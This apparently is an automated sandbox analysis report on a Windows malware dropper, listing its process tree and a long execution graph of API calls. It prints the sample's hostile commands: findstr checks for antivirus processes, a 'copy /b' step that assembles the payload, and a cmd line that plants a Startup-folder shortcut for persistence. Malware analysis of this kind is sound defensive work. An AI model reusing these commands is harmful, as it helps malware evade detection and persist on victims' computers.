                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:7
                                                                          Start time:10:24:08
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                          Imagebase:0xbc0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:10:24:08
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /c md 316094
                                                                          Imagebase:0x1c0000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:9
                                                                          Start time:10:24:08
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /V "SequenceOctoberContributionRef" Recreation
                                                                          Imagebase:0xbc0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:10
                                                                          Start time:10:24:08
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /c copy /b ..\Metres + ..\Scientists + ..\Prep + ..\Responsible + ..\Stranger + ..\Components + ..\Medium + ..\Ima + ..\My + ..\Indiana u
                                                                          Imagebase:0x1c0000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:11
                                                                          Start time:10:24:09
                                                                          Start date:29/11/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:Intranet.pif u
                                                                          Imagebase:0x4a0000
                                                                          File size:893'608 bytes
                                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 8%, ReversingLabs
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:12
                                                                          Start time:10:24:09
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\choice.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:choice /d y /t 5
                                                                          Imagebase:0x950000
                                                                          File size:28'160 bytes
                                                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:13
                                                                          Start time:10:24:10
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url" & echo URL="C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url" & exit
                                                                          Imagebase:0x1c0000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:14
                                                                          Start time:10:24:10
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:16
                                                                          Start time:10:24:22
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\System32\wscript.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js"
                                                                          Imagebase:0x7ff6989e0000
                                                                          File size:170'496 bytes
                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:17
                                                                          Start time:10:24:22
                                                                          Start date:29/11/2024
                                                                          Path:C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr" "C:\Users\user\AppData\Local\Immersive Creations Co\D"
                                                                          Imagebase:0x180000
                                                                          File size:893'608 bytes
                                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 8%, ReversingLabs
                                                                          Has exited:true

                                                                          Target ID:19
                                                                          Start time:10:24:48
                                                                          Start date:29/11/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          Imagebase:0x4a0000
                                                                          File size:893'608 bytes
                                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:22
                                                                          Start time:10:25:06
                                                                          Start date:29/11/2024
                                                                          Path:C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr"
                                                                          Imagebase:0x180000
                                                                          File size:893'608 bytes
                                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:17.7%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:20.7%
                                                                            Total number of Nodes:1526
                                                                            Total number of Limit Nodes:34
                                                                            execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 4418->4420 4422 40490c 4419->4422 4419->4433 4424 4048ea 4420->4424 4421 404960 CallWindowProcW 4421->4424 4434 40484e SendMessageW 4422->4434 4423->4421 4439 406009 lstrcpynW 4423->4439 4427 404945 4440 405f51 wsprintfW 4427->4440 4429 40494c 4430 40141d 80 API calls 4429->4430 4431 404953 4430->4431 4441 406009 lstrcpynW 4431->4441 4433->4421 4435 404871 GetMessagePos ScreenToClient SendMessageW 4434->4435 4436 4048ab SendMessageW 4434->4436 4437 4048a3 4435->4437 4438 4048a8 4435->4438 4436->4437 4437->4423 4438->4436 4439->4427 4440->4429 4441->4433 4442 4022cc 4443 40145c 18 API calls 4442->4443 4444 4022d3 4443->4444 4445 4062d5 2 API calls 4444->4445 4446 4022d9 4445->4446 4447 4022e8 4446->4447 4451 405f51 wsprintfW 4446->4451 4450 4030e3 4447->4450 4452 405f51 wsprintfW 4447->4452 4451->4447 4452->4450 4222 4050cd 4223 405295 4222->4223 4224 4050ee GetDlgItem GetDlgItem GetDlgItem 4222->4224 4225 4052c6 4223->4225 4226 40529e GetDlgItem CreateThread CloseHandle 4223->4226 4271 403d98 SendMessageW 4224->4271 4228 4052f4 4225->4228 4230 4052e0 ShowWindow ShowWindow 4225->4230 4231 405316 4225->4231 4226->4225 4274 405047 83 API calls 4226->4274 4232 405352 4228->4232 4234 405305 4228->4234 4235 40532b ShowWindow 4228->4235 4229 405162 4242 406805 18 API calls 4229->4242 4273 403d98 SendMessageW 4230->4273 4236 403dca 8 API calls 4231->4236 4232->4231 4237 40535d SendMessageW 4232->4237 4238 403d18 SendMessageW 4234->4238 4240 40534b 4235->4240 4241 40533d 4235->4241 4239 40528e 4236->4239 4237->4239 4244 405376 CreatePopupMenu 4237->4244 4238->4231 4243 403d18 SendMessageW 4240->4243 4245 404f72 25 API calls 4241->4245 4246 405181 4242->4246 4243->4232 4247 406805 18 API calls 4244->4247 4245->4240 4248 4062a3 11 API calls 4246->4248 4250 405386 AppendMenuW 4247->4250 4249 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4248->4249 4251 4051f3 4249->4251 4252 4051d7 SendMessageW SendMessageW 4249->4252 4253 405399 GetWindowRect 4250->4253 4254 4053ac 4250->4254 4255 405206 4251->4255 4256 4051f8 SendMessageW 4251->4256 4252->4251 4257 4053b3 TrackPopupMenu 4253->4257 4254->4257 4258 403d3f 19 API calls 4255->4258 4256->4255 4257->4239 4259 4053d1 4257->4259 4260 405216 4258->4260 4261 4053ed SendMessageW 4259->4261 4262 405253 GetDlgItem SendMessageW 4260->4262 4263 40521f ShowWindow 4260->4263 4261->4261 4264 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4261->4264 4262->4239 4267 405276 SendMessageW SendMessageW 4262->4267 4265 405242 4263->4265 4266 405235 ShowWindow 4263->4266 4268 40542f SendMessageW 4264->4268 4272 403d98 SendMessageW 4265->4272 4266->4265 4267->4239 4268->4268 4269 40545a GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4239 4271->4229 4272->4262 4273->4228 4453 4030cf 4454 40145c 18 API calls 4453->4454 4455 4030d6 4454->4455 4457 4030dc 4455->4457 4460 4063ac GlobalAlloc lstrlenW 4455->4460 4458 4030e3 4457->4458 4487 405f51 wsprintfW 4457->4487 4461 4063e2 4460->4461 4462 406434 4460->4462 4463 40640f GetVersionExW 4461->4463 4488 40602b CharUpperW 4461->4488 4462->4457 4463->4462 4464 40643e 4463->4464 4465 406464 LoadLibraryA 4464->4465 4466 40644d 4464->4466 4465->4462 4469 406482 GetProcAddress GetProcAddress GetProcAddress 4465->4469 4466->4462 4468 406585 GlobalFree 4466->4468 4470 40659b LoadLibraryA 4468->4470 4471 4066dd FreeLibrary 4468->4471 4474 4064aa 4469->4474 4477 4065f5 4469->4477 4470->4462 4473 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4470->4473 4471->4462 4472 406651 FreeLibrary 4481 40662a 4472->4481 4473->4477 4475 4064ce FreeLibrary GlobalFree 4474->4475 4474->4477 4483 4064ea 4474->4483 4475->4462 4476 4066ea 4479 4066ef CloseHandle FreeLibrary 4476->4479 4477->4472 4477->4481 4478 4064fc lstrcpyW OpenProcess 4480 40654f CloseHandle CharUpperW lstrcmpW 4478->4480 4478->4483 4482 406704 CloseHandle 4479->4482 4480->4477 4480->4483 4481->4476 4484 406685 lstrcmpW 4481->4484 4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665 4666 401c70 4665->4666 4667 4062a3 11 API calls 4666->4667 4668 401c80 4667->4668 4669 405ca0 MessageBoxIndirectW 4668->4669 4670 401a13 4669->4670 4678 402f6e 4679 402f72 4678->4679 4680 402fae 4678->4680 4681 4062a3 11 API calls 4679->4681 4682 40145c 18 API calls 4680->4682 4683 402f7d 4681->4683 4688 402f9d 4682->4688 4684 4062a3 11 API calls 4683->4684 4685 402f90 4684->4685 4686 402fa2 4685->4686 4687 402f98 4685->4687 4690 4060e7 9 API calls 4686->4690 4689 403e74 5 API calls 4687->4689 4689->4688 4690->4688 4691 4023f0 4692 402403 4691->4692 4693 4024da 4691->4693 4694 40145c 18 API calls 4692->4694 4695 404f72 25 API calls 4693->4695 4696 40240a 4694->4696 4701 4024f1 4695->4701 4697 40145c 18 API calls 4696->4697 4698 402413 4697->4698 4699 402429 LoadLibraryExW 4698->4699 4700 40241b GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4111 403d3f 19 API calls 4108->4111 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4116 405608 SetClassLongW 4111->4116 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 40141d 80 API calls 4124->4143 4125 4058de DestroyWindow KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4163 40581e DestroyWindow 4143->4163 4173 403d3f 4143->4173 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4149 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 